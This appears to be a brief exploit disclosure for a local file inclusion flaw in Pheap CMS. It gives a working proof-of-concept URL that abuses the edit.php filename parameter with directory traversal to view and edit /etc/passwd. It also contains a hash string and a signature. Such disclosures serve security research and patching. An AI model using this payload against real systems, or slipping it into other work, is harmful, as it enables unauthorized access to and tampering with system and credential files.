Pheap CMS suffers from a local file inclusion vulnerability that allows for the editing of the file.
842a4df23f9fcebd6f8dbbf0b19d3f06ea6eca1f4fb7445f7998f76cb1e57915
edit & view local file [lfi + edit]:
/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd
regards laurent gaffiƩ